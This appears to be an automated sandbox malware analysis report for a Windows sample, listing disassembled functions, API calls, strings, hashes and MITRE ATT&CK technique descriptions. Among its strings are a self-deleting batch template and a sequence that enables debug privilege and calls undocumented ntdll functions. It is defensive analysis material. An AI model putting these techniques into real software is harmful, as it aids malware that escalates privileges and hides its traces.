Opcode ID: 0892817d38b40e1b0ad9a8c4567190a76d172e75f1246c8c37e2aa95ecc3e8a6
Instruction ID: 328b974c18543f95d0714503b78516069191b0979cb7b9c43cb9f71188a19efc
Opcode Fuzzy Hash: 0892817d38b40e1b0ad9a8c4567190a76d172e75f1246c8c37e2aa95ecc3e8a6
Instruction Fuzzy Hash: 830192B5900609EFDB00DFE4D989AAEBBB9FB04305F10456AE606A2251DB719E44DB50

Function 008F139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008F13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 008F1448

Part of subcall function 008F119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,?,?,008F13EF), ref: 008F11AB
Part of subcall function 008F119F: OpenProcessToken.ADVAPI32(00000000,00000028,008F13EF,?,?,?,?,?,?,008F13EF), ref: 008F11BB
Part of subcall function 008F119F: AdjustTokenPrivileges.ADVAPI32(008F13EF,00000000,?,00000010,00000000,00000000), ref: 008F11EB
Part of subcall function 008F119F: CloseHandle.KERNEL32(008F13EF), ref: 008F11FA
Part of subcall function 008F119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,008F13EF), ref: 008F1203

Strings

SeDebugPrivilege, xrefs: 008F13D3
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F13A8

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$SeDebugPrivilege
API String ID: 4123949106-1505032940
Opcode ID: 72deacd5358a01946d7a94b942b4c970e7710a4d1d711d9ce011fab83b14dfde
Instruction ID: 14695d99df7f31fa6b8bc8448b09c069b4b5dba2575fb90fb5a7d6b09c180a12
Opcode Fuzzy Hash: 72deacd5358a01946d7a94b942b4c970e7710a4d1d711d9ce011fab83b14dfde
Instruction Fuzzy Hash: B7312C71D0020DEAEF209BB58C49FFEBBB9FB94704F2041AAE604F2141D7749A45CB61

Function 008F239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 008F23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008F2464
GetFileSize.KERNEL32(00000000,00000000), ref: 008F2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 008F24A8
memset.MSVCRT ref: 008F24B9
strrchr.MSVCRT ref: 008F24C9
wsprintfA.USER32 ref: 008F24DE
strrchr.MSVCRT ref: 008F24ED
memset.MSVCRT ref: 008F24F2
memset.MSVCRT ref: 008F2505
wsprintfA.USER32 ref: 008F2524
Sleep.KERNEL32(000007D0), ref: 008F2535
Sleep.KERNEL32(000007D0), ref: 008F255D
memset.MSVCRT ref: 008F256E
wsprintfA.USER32 ref: 008F2585
memset.MSVCRT ref: 008F25A6
wsprintfA.USER32 ref: 008F25CA
Sleep.KERNEL32(000007D0), ref: 008F25D0
Sleep.KERNEL32(000007D0,?,?), ref: 008F25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008F25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 008F2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 008F2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 008F265B
SetEndOfFile.KERNEL32 ref: 008F266D
CloseHandle.KERNEL32(00000000), ref: 008F2676
RemoveDirectoryA.KERNEL32(?), ref: 008F2681

Strings

%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 008F25C4
%s X -ibck "%s" "%s\", xrefs: 008F251E
%s\, xrefs: 008F257F
%s%s, xrefs: 008F24D8
C:\Users\user\AppData\Local\Temp\, xrefs: 008F23B1, 008F23B6, 008F24CD
-ibck, xrefs: 008F25BA

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-774930870
Opcode ID: 39facb59703a0efa951d860c0dbc170acb7d15f87b6223e8630363d37008a188
Instruction ID: 42398f2883f2f809ab47caa469b6dfc03777747e4721c63f23ed405f92dcae53
Opcode Fuzzy Hash: 39facb59703a0efa951d860c0dbc170acb7d15f87b6223e8630363d37008a188
Instruction Fuzzy Hash: 69817DB1504348ABD7109F74DC49EBBBBACFB88714F00051AF755D21A0DB749A49CB66

Function 008F274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 008F2766
memset.MSVCRT ref: 008F2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 008F2787
wsprintfA.USER32 ref: 008F27AB

Part of subcall function 008F185B: GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
Part of subcall function 008F185B: srand.MSVCRT ref: 008F1878
Part of subcall function 008F185B: rand.MSVCRT ref: 008F1880
Part of subcall function 008F185B: srand.MSVCRT ref: 008F1890
Part of subcall function 008F185B: rand.MSVCRT ref: 008F1894

wsprintfA.USER32 ref: 008F27C6
CopyFileA.KERNEL32(?,008F4C80,00000000), ref: 008F27D4
wsprintfA.USER32 ref: 008F27F4

Part of subcall function 008F1973: PathFileExistsA.SHLWAPI(008F4E5C,00000000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1992
Part of subcall function 008F1973: CreateFileA.KERNEL32(008F4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008F19BA
Part of subcall function 008F1973: Sleep.KERNEL32(00000064), ref: 008F19C6
Part of subcall function 008F1973: wsprintfA.USER32 ref: 008F19EC
Part of subcall function 008F1973: CopyFileA.KERNEL32(008F4E5C,?,00000000), ref: 008F1A00
Part of subcall function 008F1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F1A1E
Part of subcall function 008F1973: GetFileSize.KERNEL32(008F4E5C,00000000), ref: 008F1A2C
Part of subcall function 008F1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 008F1A46
Part of subcall function 008F1973: ReadFile.KERNEL32(008F4E5C,008F4E60,00000000,?,00000000), ref: 008F1A65

DeleteFileA.KERNEL32(?,?,008F4E54,008F4E58), ref: 008F281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,008F4E54,008F4E58), ref: 008F2832

Strings

C:\Windows\system32, xrefs: 008F27E3
%s\%s, xrefs: 008F27EE
\WinRAR\Rar.exe, xrefs: 008F2793
%s%s, xrefs: 008F27A5
%s%.8x.exe, xrefs: 008F27BB
C:\Users\user\AppData\Local\Temp\, xrefs: 008F27B6
c_31892.nls, xrefs: 008F27DE

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3099098879
Opcode ID: 8f27e467723549cc090383bd04d471ad0c77d519b3847ed1d5f89ba94c81f12f
Instruction ID: fcbd5d6010cc623b6a18480393145a3feb6633926ce973a333f7bf7597029336
Opcode Fuzzy Hash: 8f27e467723549cc090383bd04d471ad0c77d519b3847ed1d5f89ba94c81f12f
Instruction Fuzzy Hash: F0215BB694021C7BEB10E7B89C89EFB776CFB04755F4005A2B764E2142E674DF848AA0

Function 008F1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008F185B: GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
Part of subcall function 008F185B: srand.MSVCRT ref: 008F1878
Part of subcall function 008F185B: rand.MSVCRT ref: 008F1880
Part of subcall function 008F185B: srand.MSVCRT ref: 008F1890
Part of subcall function 008F185B: rand.MSVCRT ref: 008F1894

wsprintfA.USER32 ref: 008F15AA
wsprintfA.USER32 ref: 008F15C6
lstrlen.KERNEL32(?), ref: 008F15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 008F15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 008F1609
CloseHandle.KERNEL32(00000000), ref: 008F1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 008F162D

Strings

%s%.8x.bat, xrefs: 008F15A4
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F158A, 008F15B3, 008F15B8, 008F15B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 008F15C0
C:\Users\user\AppData\Local\Temp\, xrefs: 008F1599
open, xrefs: 008F1627

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$open
API String ID: 617340118-938945071
Opcode ID: 895a9e1c707b858c493b28f704d20f09c3a7da2759adc81383640fdebe2c7da4
Instruction ID: 2e955a70e2925535297584e9548d52bcae662a5c773545c22a6dbcb45424ec1f
Opcode Fuzzy Hash: 895a9e1c707b858c493b28f704d20f09c3a7da2759adc81383640fdebe2c7da4
Instruction Fuzzy Hash: A7111F76A0112CBADB2097B59C89DFB7A6CFF59761F000052F659E2140EA649B84CAB0

Function 008F120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,008F1400), ref: 008F1226
GetProcAddress.KERNEL32(00000000), ref: 008F122D
GetCurrentProcessId.KERNEL32(?,?,?,?,008F1400), ref: 008F123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,008F1400), ref: 008F1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,008F1400), ref: 008F129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,008F1400), ref: 008F12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,008F1400), ref: 008F12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,008F1400), ref: 008F130A

Strings

ntdll.dll, xrefs: 008F1219
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F1262
ZwQuerySystemInformation, xrefs: 008F1212

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-3201997827
Opcode ID: caed562a8b6e70c76fd501713b3c2d5ad8f6bacfe6cd0ee6709e4ae0f7ef50b1
Instruction ID: 295d01f8b18274be4746d5c21442619bb2bc42073295396d65f89ff6a6b668f9
Opcode Fuzzy Hash: caed562a8b6e70c76fd501713b3c2d5ad8f6bacfe6cd0ee6709e4ae0f7ef50b1
Instruction Fuzzy Hash: DD21BD31705719EBDB20DBB58C08F7BBAA8FB85B10F000919F645E6280DB749A44C7A5

Function 008F2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,008F29DB,?,00000001), ref: 008F26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,008F29DB,?,00000001), ref: 008F26B5
lstrlen.KERNEL32(?), ref: 008F26C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 008F26CE
lstrcpy.KERNEL32(00000004,?), ref: 008F26E3
lstrcpy.KERNEL32(?,00000004), ref: 008F271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 008F272D
SetEvent.KERNEL32 ref: 008F273C

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: cf3e7d2ef39be0a49805f0fdb53ef43f74c3657cf2bfc334275863fc443ed806
Instruction ID: 527ba7a7710d7b437272f363660a44183d6f315b7b6d20e2a453fbeda90e89b8
Opcode Fuzzy Hash: cf3e7d2ef39be0a49805f0fdb53ef43f74c3657cf2bfc334275863fc443ed806
Instruction Fuzzy Hash: DF116A7A500618EFCB21AF39EC48C7B7BA9FB94721714802BFA58C7220DB709D95DB50

Function 008F1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 008F1BCD
rand.MSVCRT ref: 008F1BD8
memset.MSVCRT ref: 008F1C43
memcpy.MSVCRT(?,YWKmOnYauQpPZufrAsIqfTxyGEQGVTHpqJbBPtXzeeJrVqYKwFLcApoCPhIwSdSmbNlKkUolSxvtQOMLsecyRGgsavxDVfRHUroHEdiRjXLjkCbcBZmWNhzDWanZdggNtMXhUOCDBwvljiyTzAJIMEkFinFu,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 008F1C4F
lstrcat.KERNEL32(?,.exe), ref: 008F1C5D

Strings

.exe, xrefs: 008F1C57
YWKmOnYauQpPZufrAsIqfTxyGEQGVTHpqJbBPtXzeeJrVqYKwFLcApoCPhIwSdSmbNlKkUolSxvtQOMLsecyRGgsavxDVfRHUroHEdiRjXLjkCbcBZmWNhzDWanZdggNtMXhUOCDBwvljiyTzAJIMEkFinFu, xrefs: 008F1B8A, 008F1B9C, 008F1C15, 008F1C49

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$YWKmOnYauQpPZufrAsIqfTxyGEQGVTHpqJbBPtXzeeJrVqYKwFLcApoCPhIwSdSmbNlKkUolSxvtQOMLsecyRGgsavxDVfRHUroHEdiRjXLjkCbcBZmWNhzDWanZdggNtMXhUOCDBwvljiyTzAJIMEkFinFu
API String ID: 122620767-3324622049
Opcode ID: f44a030acd001e749f7898236ac8b9027c5dbe2b935cf1424361267bb4de5c49
Instruction ID: fe88a39ce9507d4c5dc3f1d4e500a1ae414af22b238563ce95d058496bb0e1ba
Opcode Fuzzy Hash: f44a030acd001e749f7898236ac8b9027c5dbe2b935cf1424361267bb4de5c49
Instruction Fuzzy Hash: 57214932E44294EED72523396C48F7A3B44FFE3721F1610ABFA959B1A3D5A40985C261

Function 008F189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 008F18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 008F18D3
CloseHandle.KERNEL32(008F2549), ref: 008F18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 008F18F0
GetExitCodeProcess.KERNEL32(?,008F2549), ref: 008F1901
CloseHandle.KERNEL32(?), ref: 008F190A

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 1e5e5b5dc5c0bd15a92c151fcc556a018c439a29a7e8be0aebaff3e547ac6d4b
Instruction ID: 2b28ca2aaeb883b653bf6d42e676479a722e43360227940355f9358476ee64ab
Opcode Fuzzy Hash: 1e5e5b5dc5c0bd15a92c151fcc556a018c439a29a7e8be0aebaff3e547ac6d4b
Instruction Fuzzy Hash: C401217690112CBBCF216BA5DC48DEF7F7DFF85760F104122FA15E51A0D6714A58CAA0

Function 008F1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 008F1334
GetProcAddress.KERNEL32(00000000), ref: 008F133B
memset.MSVCRT ref: 008F1359

Strings

ntdll.dll, xrefs: 008F132F
NtSystemDebugControl, xrefs: 008F132A

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: a13050709c849bc3e68d4737a6f37f4f4ae3805372661825900bf50187ee01a4
Instruction ID: 43ea52c697a75ea76e61516c5e26ed6f1eb9b6c3e5f08a9b0208017f62630f47
Opcode Fuzzy Hash: a13050709c849bc3e68d4737a6f37f4f4ae3805372661825900bf50187ee01a4
Instruction Fuzzy Hash: 4D01397160020DEFDF109FB8AC89D7FBBA8FB51314F00412AFA11E2250E3B49655CA51

Function 008F1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 008F1E0B
lstrcpy.KERNEL32(?,00000001), ref: 008F1E1C
strrchr.MSVCRT ref: 008F1E2B
lstrcmpiA.KERNEL32(?,008F4488), ref: 008F1E48
lstrlen.KERNEL32(008F4488), ref: 008F1E53

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 78159c9f9bb87cc2381c7c898271faba5dc7f9ae015662c57248f3ca8db49f0d
Instruction ID: 240b858026278dc28ebf8f4e511286c74e9be3dfc6ac2c1be5b4b4d2c4bdf800
Opcode Fuzzy Hash: 78159c9f9bb87cc2381c7c898271faba5dc7f9ae015662c57248f3ca8db49f0d
Instruction Fuzzy Hash: EF01A2B291421DAFEF205770EC48FB6779CFB04310F140066EB45E2090EA74AA84CBA4

Function 008F185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
srand.MSVCRT ref: 008F1878
rand.MSVCRT ref: 008F1880
srand.MSVCRT ref: 008F1890
rand.MSVCRT ref: 008F1894

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: bd8f6948e1f7559d14051fed8606093db1fa02d0b29f697a6f15b6316c9487ee
Instruction ID: 59bdb30659c5f55e6022f168d07d588e33a57dc06f8296bde8793e23026534fc
Opcode Fuzzy Hash: bd8f6948e1f7559d14051fed8606093db1fa02d0b29f697a6f15b6316c9487ee
Instruction Fuzzy Hash: 9DE01A77A10618BBDB00A7B9EC46DAEBBACEE84161B110577F600E3254E974E944CAB4

Function 008F6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 008F603C
GetProcAddress.KERNEL32(00000000,008F6064), ref: 008F604F

Strings

kernel32.dll, xrefs: 008F603B

Memory Dump Source

Source File: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 6750f1bf0ad726f25820d4d3abd3a5fccebd0bd4d279ee86c22cd545667e8a6a
Instruction ID: 5bbbdb91308d950e35d193dd817e10e020600895e8e2b2b4a4c89a72f5afa355
Opcode Fuzzy Hash: 6750f1bf0ad726f25820d4d3abd3a5fccebd0bd4d279ee86c22cd545667e8a6a
Instruction Fuzzy Hash: 7BF0C2B114028D9BDF708E74CC44BEE37E4EB55700F50062AEA09CB241DB3486558B28

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

